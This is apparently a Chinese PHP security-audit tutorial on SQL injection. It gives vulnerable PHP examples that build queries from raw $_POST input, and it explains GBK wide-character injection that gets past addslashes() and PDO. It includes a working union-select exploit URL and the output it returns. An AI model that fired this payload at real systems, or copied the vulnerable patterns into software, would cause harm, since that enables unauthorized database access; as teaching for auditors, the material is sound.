php审计基础一：sql注入

【1】普通sql注入：

$sql = "INSERT INTO books(bookname, publisher, author, price, ptime,pic,detail) VALUES('{$_POST["bookname"]}', '{$_POST["publisher"]}', '{$_POST["author"]}', '{$_POST["price"]}', '".time()."', '{$up[1]}', '{$_POST["detail"]}')";$result = mysql_query($sql);if($result && mysql_affected_rows() > 0 ) {echo "插入一条数据成功!";}else {echo "数据录入失败!";}

直接将传入的参数不加过滤进入到数据库中

【2】宽字符注入：

条件

当mysql建表时，将表的字符集设置成gbk时（defaultcharset=gbk)

且当在php连接数据库时将数据库的字符集设置成(mysql_query("setcharacter_set_client=gbk");

(1)可利用%df%27绕过addslashes()这个函数

(2)可绕过pdo的quote（）这个函数

（3）pdo的也被绕过：

第一种写法：

<?phpheader("Content-type:text/html;charset=utf-8");  try {    $pdo = new PDO("mysql:host=localhost;dbname=test","root","niexinming132"); } catch (Exception $ex) {    echo "连接失败";}echo "连接成功";$pdo->query("set character_set_client=gbk");$id=$_GET["id"];$query="select * from myuser where id=?";echo $query;echo "<br>";$stmt=$pdo->prepare($query);$pdostat=$stmt->execute(array($id));foreach ($stmt->fetchAll(PDO::FETCH_ASSOC) as $row){    foreach ($row as $data)    {        echo $data."        ";    }    echo "<br>";}

第二种写法：

<?phpheader("Content-type:text/html;charset=utf-8");  try {    $pdo = new PDO("mysql:host=localhost;dbname=test","root","niexinming132"); } catch (Exception $ex) {    echo "连接失败";}echo "连接成功";$pdo->query("set character_set_client=gbk");$id=$_GET["id"];$query="select * from myuser where id=:id";echo $query;echo "<br>";$stmt=$pdo->prepare($query);$pdostat=$stmt->execute(array("id"=>$id));foreach ($stmt->fetchAll(PDO::FETCH_ASSOC) as $row){    foreach ($row as $data)    {        echo $data."        ";    }    echo "<br>";    echo "执行完毕";    var_dump($pdo->errorInfo());}

利用：

http://localhost:8000/gbksql2.php?id=-1%df%27%20union%20select%201,version(),user(),4%20%23

显示：

连接成功select* from myuser where id=:id
1 5.5.50-0ubuntu0.14.04.1-logroot@localhost 4
执行完毕